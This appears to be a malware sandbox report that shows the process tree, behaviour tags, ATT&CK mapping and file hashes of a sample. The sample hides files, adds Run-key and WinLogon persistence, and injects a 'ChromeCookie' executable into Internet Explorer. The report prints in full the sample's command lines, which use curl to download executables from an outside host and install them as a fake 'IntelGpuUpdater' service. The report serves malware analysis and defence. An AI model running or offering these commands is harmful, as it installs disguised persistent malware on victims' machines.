C:\Users\Admin\AppData\Local\test.exeC:\Users\Admin\AppData\Local\test.exe4⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\test.exe" +s +h5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\AppData\Local\test.exe" +s +h6⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3408
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local" +s +h5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\AppData\Local" +s +h6⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3312
-
-
-
C:\Users\Admin\AppData\Local\Temp\ChromeCookies\ChromeCookie.exe"C:\Users\Admin\AppData\Local\Temp\ChromeCookies\ChromeCookie.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:384 -
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"6⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\SysWOW64\notepad.exenotepad7⤵
- System Location Discovery: System Language Discovery
PID:4720
-
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 54⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4912
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000" > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
PID:1128 -
C:\Windows\SysWOW64\cmd.execmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000"3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3104 -
C:\Windows\SysWOW64\curl.execurl https://dontuseme.ct8.pl/test.exe4⤵
- System Location Discovery: System Language Discovery
PID:1412
-
-
C:\Windows\SysWOW64\curl.execurl https://dontuseme.ct8.pl/nssm.exe4⤵
- System Location Discovery: System Language Discovery
PID:5068
-
-
C:\Windows\IntelGpuUpdaterHelper.exeC:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2528
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc start IntelGpuUpdater4⤵
- System Location Discovery: System Language Discovery
PID:4872 -
C:\Windows\SysWOW64\sc.exesc start IntelGpuUpdater5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/50004⤵
- System Location Discovery: System Language Discovery
PID:4788 -
C:\Windows\SysWOW64\sc.exesc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/50005⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2568
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c pause2⤵
- System Location Discovery: System Language Discovery
PID:1092
-
-
C:\Windows\IntelGpuUpdaterHelper.exeC:\Windows\IntelGpuUpdaterHelper.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3596 -
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4236 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Windows\IntelGpuUpdater.exe" +s +h3⤵
- System Location Discovery: System Language Discovery
PID:1028 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\IntelGpuUpdater.exe" +s +h4⤵
- Sets file to hidden
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3008
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Windows" +s +h3⤵
- System Location Discovery: System Language Discovery
PID:228 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows" +s +h4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3428
-
-
-
C:\Windows\TEMP\ChromeCookies\ChromeCookie.exe"C:\Windows\TEMP\ChromeCookies\ChromeCookie.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:5112 -
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"4⤵
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4876 -
C:\Windows\notepad.exenotepad5⤵
- Modifies data under HKEY_USERS
PID:396
-
-
-
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4188
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2956
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:404
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2508
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4688
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2700
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4932
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
251KB
MD557bd4f73690590693b5b921f29679410
SHA1c2cb47bf602541043589e979f21c3d7c1698e3ac
SHA2568a3de78cf177be4c37c1525becf05af336c1dc2a4d181cae79f6903754902efa
SHA51200b543644058a93f1c0a13e4d40b1c4e76f9581325f1773d79983761ca6903643e5a44717e7785b27a8fac2a6609c19032e3f412d3339e9cc5dc697791890318
-
Filesize
256KB
MD5c721739bd54dd9beb16909f6807b73c5
SHA15ec54658246914144293357f302e68bf9972fb71
SHA2567376ce1eefd786d30efbecb716a13e9d23d27cfc362ce1bbc2fbebdf4fbf54ea
SHA5120800c5f0425237219d7d34654cc021b8b8aa1fce1545ba9815c7be12a623edb08a098fd4de40ccc867487639647cb7f316316464a3a0bdb0650fdd2852408b4e